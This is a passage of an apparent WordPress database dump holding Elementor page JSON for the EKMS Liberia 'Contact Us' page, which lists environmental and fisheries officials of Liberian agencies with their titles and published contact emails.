Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23109,3340,'_wp_attached_file','2021/01/francis-2.png'),(23110,3340,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:21:\"2021/01/francis-2.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"francis-2-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"francis-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23111,3341,'_elementor_edit_mode','builder'),(23112,3341,'_elementor_template_type','wp-page'),(23113,3341,'_elementor_version','3.0.16'),(23114,3341,'_wp_page_template','default'),(23115,3341,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a 